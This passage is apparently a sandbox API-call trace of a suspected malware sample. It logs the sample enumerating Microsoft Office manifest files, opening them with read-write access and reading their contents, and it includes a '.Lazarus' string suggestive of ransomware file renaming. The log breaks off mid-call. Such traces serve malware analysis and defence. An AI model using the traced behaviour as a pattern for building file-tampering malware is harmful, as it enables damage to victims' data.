RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 105 [0098.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.646] GetFileType (hFile=0x418) returned 0x1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.647] CloseHandle (hObject=0x418) returned 1 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.648] AreFileApisANSI () returned 1 [0098.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 105 [0098.648] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x839bc0c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x839bc0c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.648] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e3474a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x112a4e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", cAlternateFileName="APC1E2~1.XML")) returned 1 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0098.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0098.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d178 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89470 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x899e0 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89470 | out: hHeap=0x20000) returned 1 [0098.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x899e0 | out: hHeap=0x20000) returned 1 [0098.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.649] AreFileApisANSI () returned 1 [0098.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.650] AreFileApisANSI () returned 1 [0098.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 105 [0098.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.650] GetFileType (hFile=0x418) returned 0x1 [0098.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.650] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.650] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.651] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.651] CloseHandle (hObject=0x418) returned 1 [0098.651] AreFileApisANSI () returned 1 [0098.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 105 [0098.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.651] GetFileType (hFile=0x418) returned 0x1 [0098.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.651] CloseHandle (hObject=0x418) returned 1 [0098.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.653] AreFileApisANSI () returned 1 [0098.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 105 [0098.653] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e3474a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x112a4e)) returned 1 [0098.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.653] AreFileApisANSI () returned 1 [0098.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0098.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.653] GetLastError () returned 0x0 [0098.653] SetLastError (dwErrCode=0x0) [0098.653] AreFileApisANSI () returned 1 [0098.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 105 [0098.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.654] GetFileType (hFile=0x418) returned 0x1 [0098.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.654] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0098.654] ReadFile (in: hFile=0x418, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0098.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0098.657] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0098.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0098.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0098.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dfc0 [0098.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x944a8 [0098.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0098.658] GetLastError () returned 0x0 [0098.658] SetLastError (dwErrCode=0x0) [0098.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.658] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, 